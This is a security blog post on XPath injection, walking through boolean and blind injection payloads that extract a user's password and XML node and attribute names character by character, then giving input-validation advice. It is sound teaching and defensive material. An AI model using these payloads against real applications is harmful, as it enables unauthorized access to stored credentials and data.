Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Trustwave SpiderLabs Uncovers Ov3r_Stealer Malware Spread via Phishing and Facebook Advertising. Learn More

Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Microsoft Exchange Server Attacks
Stay protected against emerging threats
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats
SpiderLabs Blog

Be Off the Beaten XPath, Go Blind

XPath (XML Path Language) is a language used to query XML documents in order to extract data. XML files are commonly used to store information on the server and particularly configuration settings. There are some small application that would manipulate small portions of data often stored in XML files in order to avoid deploying a full database environment. In this case, the data stored is usually not very sensitive, but it can be more interesting when the application uses XML documents to store configuration data such as user settings. When the user-supplied input is directly used to build an XPath query without being validated, it can be possible to inject commands in the same way you exploit an SQL Injection flaw.

XPath Basics

Let's see a basic example on how Xpath works and how an application can navigate within the XML document to retrieve data. Consider an application that stores information about users in an XML file:

<user Id="1" FirstName="Chris" LastName="Travis" BirthDay="1990-12-22">
<user Id="2" FirstName="John" LastName="Rosewood" BirthDay="1977-03-19">
<user Id="3" FirstName="Mark" LastName="Borgui" BirthDay="1997-10-03">

Using XPath you can retrieve any information from within the document (attributes, node text, comments,...). For instance, to retrieve the email addresses of every user you can use the following query:



To extract the BirthDay attribute value for every user:




Remember that XPath syntax is case sensitive. This means the attribute "BirthDay" is different than the attribute "birthday"

To extract BirthDay attribute value of users with the "user" role:




Injecting into XPath

So now that we understand how XPath works, let's see how an attacker could inject arbitrary command to retrieve information he should not be able to see. Consider a functionality that returns the birthday date of a given login and role. For example, if the user supplies login=jrosewood and role=operator, the application will build the following XPath query:

//users/user[login/text()='jrosewood' and role/text()='operator']/@BirthDay



If the application is concatenating the user-supplied data to the XPath query string without any validation, it is possible to send the following values to manipulate the original query:

role=' or 'a'='a

That will result in the following XPath query:

//users/user[login/text()='' and role/text()='' or 'a'='a']/@BirthDay



The OR Boolean term is always true and the query will return all the BirthDay entries. Well, not very useful at this point, but let's see how we can extract more data.

As in SQL language, XPath has a substring function that can be used to extract a subset of characters from a string. For instance, the following query will test if the first character of John Rosewood's password is 'A':

role=operator' and substring(password/text(),1,1)='A' and 'a'='a

The resulting XPath query is now:

//users/user[login/text()='jrosewood' and role/text()='operator' and substring(password/text(),1,1)='A' and 'a'='a']/@BirthDay

This should not return anything, because the last term of the AND sequence is false (the first character is not 'A'). If we test for the letter 's', this will return his BirthDay date, meaning the first character is 's'. Using this technique we are able to extract the full password by retrieving each character one by one.

role=operator' and substring(password/text(),2,1)='3' and 'a'='a
role=operator' and substring(password/text(),3,1)='c' and 'a'='a
role=operator' and substring(password/text(),4,1)='r' and 'a'='a

Well, but this means you already know the structure of the XML document, right? Not an issue, with XPath it is also possible to retrieve tag and attribute names.

Going blind

In a situation where no information about the XML document structure is known, XPath can still be used to extract data. For instance, to retrieve the root tag name, the following query can be used:


The name() function returns the name of the current node. As XML documents can only have one root element, one value will be returned. We can now extract the full name the same way we saw before:

role=operator' and substring(name(//*),1,1)='u' and 'a'='a
role=operator' and substring(name(//*),2,1)='s' and 'a'='a
role=operator' and substring(name(//*),3,1)='e' and 'a'='a

To retrieve the attribute value, the following query could be used:


This one needs a bit more of explanation. It first navigates until the first <user> element under <users> and then retrieves its first attribute. The position() function returns the index position of the current node (we want the first one). As you may have noticed, there is a handy way to retrieve attribute by selecting its index position: @*[index]. Here, @*[1] means returning the first attribute. Let's use this with our attack payload:

role=operator' and substring(name(//users/user[position()=1]/@*[1]),1,1)='I' and 'a'='a
role=operator' and substring(name(//users/user[position()=1]/@*[1]),2,1)='d' and 'a'='a

Other useful functions can also be used:

  • count(): returns the number of nodes (useful to automate the extraction and iterate the position() value without going too far).For example, to retrieve the number of <user> elements:


    role=operator' and count(//users/user)=3 and 'a'='a

  • string-length(): returns the length of the string (useful to iterate the extraction of characters with substring()). To retrieve the first attribute name length of the first <user> node:


    role=operator' and string-length(name(//users/user[position()=1]/@*[1]))=2 and 'a'='a


XPath is a standard language, which means it is possible to use the same attack string for any implementation, which differs from SQL language. Also, unlike database objects, it is not possible to restrict the access to parts of the XML document. Once the application is authorized to read an XML file, it can access any data within it.

To protect the application against XPath Injection attacks, every user-supplied input must be validated before being used in an XPath query. Unlike SQL, there is no Parameterized Queries available for XPath. The best way is to use "Exact Match" validation, where inputs are compared to a list of known good values (i.e. states or zip code). If not possible, use a "White List" validation to only accept the known good characters. Basically, only alphanumeric characters should be authorized. At least, the following special characters must be rejected:

/ ( ) , = ' [ ] * : and all whitespace

Remember to always reject the query, sending a message back to the user specifying the correct format. Never try to sanitize or substitute the unwanted characters.

Latest SpiderLabs Blogs

Hunting For Integer Overflows In Web Servers

Allow me to set the scene and start proceedings off with a definition of an integer overflow, according to Wikipedia:

Read More

Welcome to Adventures in Cybersecurity: The Defender Series

I’m happy to say I’m done chasing Microsoft certifications (AZ104/AZ500/SC100), and as a result, I’ve had the time to put some effort into a blog series that hopefully will entertain and inform you...

Read More

Trustwave SpiderLabs: Insights and Solutions to Defend Educational Institutions Against Cyber Threats

Security teams responsible for defending educational institutions at higher education and primary school levels often find themselves facing harsh lessons from threat actors who exploit the numerous...

Read More